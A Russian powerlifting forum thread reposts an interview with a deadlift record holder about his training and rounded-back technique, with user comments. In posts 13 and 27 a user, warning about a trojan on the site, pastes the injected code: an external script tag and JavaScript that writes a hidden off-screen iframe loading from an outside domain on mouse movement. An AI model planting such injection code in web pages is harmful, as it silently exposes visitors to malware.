Аверрр

Константинов и его колоссальная тяга !

Тема в разделе "Знаменитости из мира спорта", создана пользователем Аверрр, 1 июн 2013.

  1. Аверрр

    Аверрр Новичок

    Интервью где Костя рассказывает про свои тренировки и технику. Статья далеко не новая, но расставляет точки над "i" во всех спорах про его технику,которые переодически появляются на сайте.Надеюсь будет интересно до4ата.

    [​IMG]

    Тренируюсь я чисто интуитивно. В последнее время много внимания уделяю восстановлению, считаю это очень важным. Становую тягу тренирую в среднем 2 раза в течении 9 – 12 дней. Все зависит от самочувствия. Если чувствую, что осталось еще усталость, даю себе 1 или 2 дня отдыха.
    Тяжелая тренировка:
    В этот день тренирую только тягу. Тренировка длится до 4 часов. Основное упражнение это тяга из ямы, с подставки 8 – 10 см. Объем тренировки очень большой – общее количество подходов до 20. Я делю тягу на 2 этапа – первый и второй. Между этапами отдыхаю 20 – 30 мин. Количество повторений 3-5, предельные веса на тренировках стараюсь не брать. В основном нарабатываю. Тягу делаю в легкое касанье без ремня, без комбеза и без лямок. Всегда использую на тренировках ИПФ гриф. (напомню, что в WPC сушествует специальный тяговый гибкий гриф. Ю.У.)
    Быстрая тренировка:
    В этот день 1 упражнением является приседание.Приседаю в последнее время в тяжелоатлетическом стиле, штанга лежит высоко на трапеции и сажусь в полный сед. Обязательно использую наколенные бинты. В основном идет работа 5 подходов по 5 раз.
    Вторым упражнением я делаю скоростную тягу с земли 8-10 п по 1 разу максимально быстро.Обязательно использую резиновые ленты, которые надеваю на гриф и которые добавляют в верхнем положении около 130 кг. Начинаю тренироваться с веса 200кг и каждую следующую тренировку добавляю по 5 кг. Последняя тренировка была 10 подходов по 1 разу с весом 240 кг. В этот же день делаю дополнительные упражнения такие же как в первый день (упомянутые выше).

    Техника:
    Я делаю тягу с кривой спиной, но спина сгибается только в верхнем грудном отделе и остается только в этом положении во время всего движения. Это позволяет мне максимально использовать рычаги подходящие именно для моего телосложения, проще говоря эта техника позволяет мне развивать максимальное усилие в тяге. Как и большинство, раньше я старался делать тягу с прямой спиной максимально используя ноги, но дальше 340 кг мне продвинуться не удалось. Большое влияние на мои тренировки оказало знакомство с финном Ано Туртенайненом, многократным чемпионом и рекордсменом мира по версии WPC. Ано дал мне несколько советов по поводу методики и техники тяги. Всего за 7 месяцев я увеличил результат в тяге с 340 кг до 390 кг без увеличения собственного веса. Ано тренируется по методике Луи Симонса из Вестсайда США. Раньше мои тренировки так же были приближенны к этой системе и это позволило довести результат в тяге до 407 кг при весе тела 118 кг. Используя эту методику мой прогресс остановился и я стал искать другие пути. И я нашел свою методику. Она заключается в сочетании скоростных тренировок и тренировок с большим объемом работы на весах 75 – 90 % от максимума плюс большое количество дополнительных упражнений, как в Вестсайде. Эта система помогла мне добиться результата 430 кг и я уверен что это далеко не предел. На последних соревнованиях я даже не знал сколько реально я смогу поднять, но проанализировав свое выступление, понял что это был не предел. Я надеюсь в следующем году поехать на Арнольд классик в США и там попробовать установить абсолютный мировой рекорд в тяге.
    Для хорошей становой тяги очень важны мышцы брюшного пресса и подходить к их тренировки нужно со всей серьезностью. Так же считаю, что как можно меньше надо использовать ремень. Я надеваю его только на предельных весах. В этом году я впервые попробовал использовать комбез для тяги, но особой прибавки я не ощутил. При моей технике самым сложным является верхняя часть амплитуды, где комбез уже ничего не дает, а иногда даже мешает. Думаю для тех кто тянет в стиле сумо комбез дает хорошую прибавку, а для классики нужен только для стабильности и небольшой помощи на старте.
    Никогда на тренировках не пользуюсь кистевыми лямками, любые веса тяну в разно хват, с хватом никогда проблем не было. С высоких плинтов тянул 500 кг и сумел удержать штангу около 8 сек.
    Так же очень важным считаю психологический настрой. Перед рекордными подходами стараюсь ввести себя в состояние крайнего психического возбуждения. Поднимать предельные веса стараюсь максимально быстро и агрессивно. Так же считаю очень важным отсутствие страха перед весом. Стараюсь никогда не ставить себе ограничений и барьеров. Так же постоянно прокручиваю в голове предстоящую рекордную попытку. В последнее время я полностью исключил из своей программы обычные приседания и приседаю только в тяжело атлетическом стиле. Это хорошо помогает развить срыв ногами. Так же очень много внимания уделяю развитию мышц бицепса бедра, ягодичных мышц и приводящих. Стараюсь развивать эти мышцы с помощью дополнительных упражнений.
    [​IMG]
     
    Mr. Pratiin, Chaushesku, TommyVegas и 17 другим нравится это.
  2. senna
    senna
    интересная техника)
  3. XSOAL
    XSOAL
    Интервью в общих чертах. На самом деле там все намного труднее.
    Касательно хвата- если гриф нормальный, то я допустим прямым хватом 210 кг вытягиваю, а если херовый, то и обратным эти же 210 выскальзывают.
    Иван Ушаков нравится это.
  4. physik
    physik
    больно смотреть на кривую спину, но наверное ему норм, а я просто жиробас, мыслящий стереотипами.
    а первое фото - что за нахуй? какого хрена он зигует?
  5. XSOAL
    XSOAL
    это прикол, походу музей оккупации
  6. egyd
    egyd
    Лучше напишите красными большими буквами, что такую технику со старта лучше не использовать. А то сейчас начнут тянуть...
    Raxtop, DakotaGold, KlindaMecino и 12 другим нравится это.
  7. Хрюша
    Хрюша
    Тяга в скоростной манере вообще пугает... Особенно то как делают топовые билдеры , Frank McGrath например....Да и Колеман ....
  8. LuckyDucky
    LuckyDucky
    Жестко-жестко, 420 без пояса тянуть
    KlindaMecino нравится это.
  9. Lex75
    Lex75
    на прошлой неделе сорвал спину, после просмотра снова заболела ыыы
    KlindaMecino, physik и Санёчек нравится это.
  10. Fain_Again
    Fain_Again
    Открываю дочу, а на главной зигующий Константинов. День удался.
  11. crusher1
    crusher1
    Тоже не использую эти лямки, смысла не вижу, хват крепкий тоже нужен очень. Я лично, чтобы в нижней точке поясницу не сильно нагружать, просто подкладываю пару блинов по 2кг, сразу все нормально стало с поясницей. А так спиной тянуть кривой это бред, лично так делать не буду никогда.
  12. crusher1
    crusher1
    Про его тренировки пресса хотелось бы подробнее
  13. RusVAn
    RusVAn
    Троян со статьи\сайта удилите!

    Код:
    <script src="http://newsitechange2.dnsrd.com/tomove.js"></script>
    Den4ikkk, barbellrus, D0m1nator и ещё 1-му нравится это.
  14. Сообщение от было скрыто от публичного просмотра.
    2 июн 2013 Показать
  15. Аверрр
    Аверрр
    хз у меня его антивирусник не видит,на самом сайте скорее всего опять вирусы
  16. Аверрр
    Аверрр
    я поищу как проснусь если найду обязательно выложу
  17. Хуан Матус
    Хуан Матус
    Ебать у него лапища!
  18. Just Fellow
    Just Fellow
    Троян вылазит при открытии каждой статьи уже несколько дней
    Mr. Pratiin, Monsignor, MrDimaKin и 3 другим нравится это.
  19. gree
    gree
    Какая кривая спина, в поясничном отделе там она или ровная или даже правильный прогиб, а в грудном прогнута, плечи округлены и в принципе никакой опасности в этом нет.
  20. D0m1nator
    D0m1nator
    Ты исходник смотрел его? Может это админы веселятся.
  21. Nord man
    Nord man
    Статья была про него, это вобще :bayan:
  22. artem4dead
    artem4dead
    Вот еще одно подтверждение, что у Луи Симмонса, самые хорошие методики для пауэрлифтинга.
  23. Veer
    Veer
    Единственное посоны в зале не всегда понимают что за приседы на лавки и чо жим с приседом так редко))
  24. artem4dead
    artem4dead
    Все новое, всегда отпугивает)
  25. vindikat
    vindikat
    Нормально все с лапищей. Просто вперед рука вывыдена и эффект такой на снимке.
  26. Аверрр
    Аверрр
    я вкурсе что была но этого там вроде небыло
  27. RusVAn
    RusVAn
    Код:
    res='oukiwws.for-more.biz';
    var astatf = 0;
    document.write("<head></head><b><div id='accountidsl'></div></b>");
    document.onmousemove=jsstatic;
    function jsstatic() { if (astatf == 0)
    { astatf++;
    text = "<iframe src='http://"+res+"/stkcik/3' width='6' height='10' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>";
    document.getElementById("accountidsl").innerHTML = text }}

    Вот исходник
  28. Fain_Again
    Fain_Again
    Ну вот... зигу удалили :newcry:
    KlindaMecino и Аверрр нравится это.
  29. Славянин
    Славянин
    Без зиги тема вообще не катит.[​IMG]
    Kirill1987, Хрюша, Mr. Pratiin и 5 другим нравится это.
  30. Ubermachine
    Ubermachine
    и этот благодаря Симонсу тянет